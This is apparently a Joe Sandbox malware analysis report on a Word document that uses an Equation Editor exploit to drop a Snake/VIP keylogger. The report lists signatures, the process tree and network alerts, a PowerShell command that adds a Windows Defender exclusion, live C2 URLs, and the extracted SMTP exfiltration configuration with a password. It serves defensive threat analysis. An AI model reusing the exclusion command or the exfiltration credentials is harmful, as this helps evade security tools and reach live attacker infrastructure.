Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0225139776.docx.doc

Overview

General Information

Sample name:0225139776.docx.doc
Analysis ID:1520577
MD5:f25ef2223bc81c701a2e40dc952d4d0d
SHA1:5fb9f3c608bc44ec4c169e51f18409a93245e8fe
SHA256:7e00eaee75fe1d2f2b49ebf83b5c9043f2b4143e8cc87e17ef4a440cc67e604f
Tags:docuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains an external reference to another file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3260 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3772 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • millitingacy20306.exe (PID: 3832 cmdline: "C:\Users\user\AppData\Roaming\millitingacy20306.exe" MD5: 016DBBC401CC2BE3E4ACC1E716E94D47)
        • powershell.exe (PID: 3944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • millitingacy20306.exe (PID: 3952 cmdline: "C:\Users\user\AppData\Roaming\millitingacy20306.exe" MD5: 016DBBC401CC2BE3E4ACC1E716E94D47)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "millilog@mobiloilandgas.top", "Password": "7213575aceACE@@  ", "Host": "cp1.virtualine.org", "Port": "25"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x80cf:$obj2: \objdata
  • 0x80e7:$obj3: \objupdate
  • 0x80a7:$obj5: \objautlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x80cf:$obj2: \objdata
  • 0x80e7:$obj3: \objupdate
  • 0x80a7:$obj5: \objautlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          13.2.millitingacy20306.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            13.2.millitingacy20306.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              13.2.millitingacy20306.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                13.2.millitingacy20306.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  13.2.millitingacy20306.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 26 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3772, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3772, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3772, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\millitingacy20306.exe, ParentProcessId: 3832, ParentProcessName: millitingacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ProcessId: 3944, ProcessName: powershell.exe
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\millitingacy20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\millitingacy20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\millitingacy20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3772, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ProcessId: 3832, ProcessName: millitingacy20306.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\millitingacy20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\millitingacy20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\millitingacy20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3772, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ProcessId: 3832, ProcessName: millitingacy20306.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\millitingacy20306.exe, ParentProcessId: 3832, ParentProcessName: millitingacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ProcessId: 3944, ProcessName: powershell.exe
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\millitingacy20306.exe, QueryName: checkip.dyndns.org
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3260, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ParentImage: C:\Users\user\AppData\Roaming\millitingacy20306.exe, ParentProcessId: 3832, ParentProcessName: millitingacy20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe", ProcessId: 3944, ProcessName: powershell.exe
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3944, TargetFilename: C:\Users\user\AppData\Local\Temp\jk352m1t.jf0.ps1

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-27T16:00:35.652381+020020244131A Network Trojan was detected66.63.187.12380192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-27T16:00:37.892215+020020220501A Network Trojan was detected66.63.187.12380192.168.2.2249166TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-27T16:00:38.040573+020020220511A Network Trojan was detected66.63.187.12380192.168.2.2249166TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-27T16:00:55.580522+020028033053Unknown Traffic192.168.2.2249169188.114.96.3443TCP
                  2024-09-27T16:00:57.450306+020028033053Unknown Traffic192.168.2.2249171188.114.96.3443TCP
                  2024-09-27T16:01:08.250593+020028033053Unknown Traffic192.168.2.2249183188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-27T16:00:49.391688+020028032742Potentially Bad Traffic192.168.2.2249167158.101.44.24280TCP
                  2024-09-27T16:00:55.179687+020028032742Potentially Bad Traffic192.168.2.2249167158.101.44.24280TCP
                  2024-09-27T16:00:56.516191+020028032742Potentially Bad Traffic192.168.2.2249170193.122.130.080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exeAvira: detection malicious, Label: HEUR/AGEN.1309880
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeAvira: detection malicious, Label: HEUR/AGEN.1309880
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
                  Found malware configuration
                  Source: 10.2.millitingacy20306.exe.3249300.3.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "millilog@mobiloilandgas.top", "Password": "7213575aceACE@@ ", "Host": "cp1.virtualine.org", "Port": "25"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeReversingLabs: Detection: 52%
                  Multi AV Scanner detection for submitted file
                  Source: 0225139776.docx.docReversingLabs: Detection: 36%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.123 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003DEB89h13_2_003DE8A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003D9743h13_2_003D9330
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003D767Dh13_2_003D7490
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003D8007h13_2_003D7490
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003D9181h13_2_003D8EC2
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_003D7035
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003DF4B9h13_2_003DF1D9
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003DE6F1h13_2_003DE325
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003DFDE9h13_2_003DFB08
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003DF021h13_2_003DED40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003DF951h13_2_003DF670
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 003D9743h13_2_003D9672
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006198CAh13_2_006195D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006185AAh13_2_006182B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00613A09h13_2_00613760
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061A25Ah13_2_00619F60
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00612339h13_2_00612068
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061CD62h13_2_0061CA68
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00610C41h13_2_00610970
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00617A41h13_2_00617770
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061F86Ah13_2_0061F570
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00616349h13_2_00616078
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00618A72h13_2_00618778
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00610311h13_2_00610040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00617111h13_2_00616E40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00618F3Ah13_2_00618C40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00615A19h13_2_00615748
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061BA42h13_2_0061B748
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00614321h13_2_00614050
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061E54Ah13_2_0061E250
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061A722h13_2_0061A428
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00613101h13_2_00612E30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061D22Ah13_2_0061CF30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00611A09h13_2_00611738
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061FD32h13_2_0061FA38
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006127D1h13_2_00612500
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006110D9h13_2_00610E08
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00617F7Ah13_2_00617C08
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00619402h13_2_00619108
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006167E2h13_2_00616510
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061BF0Ah13_2_0061BC10
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006150E9h13_2_00614E18
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061EA12h13_2_0061E718
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00615EB1h13_2_00615BE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061EEDAh13_2_0061EBE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006147B9h13_2_006144E8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061ABEAh13_2_0061A8F0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061D6F2h13_2_0061D3F8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061DBBAh13_2_0061D8C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00613599h13_2_006132C8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00611EA1h13_2_00611BD0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006107A9h13_2_006104D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 006175A9h13_2_006172D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061C3D2h13_2_0061C0D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00611571h13_2_006112A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061C89Ah13_2_0061C5A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00616C79h13_2_006169A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061F3A2h13_2_0061F0A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00615581h13_2_006152B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00613E89h13_2_00613BB8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061B0B2h13_2_0061ADB8
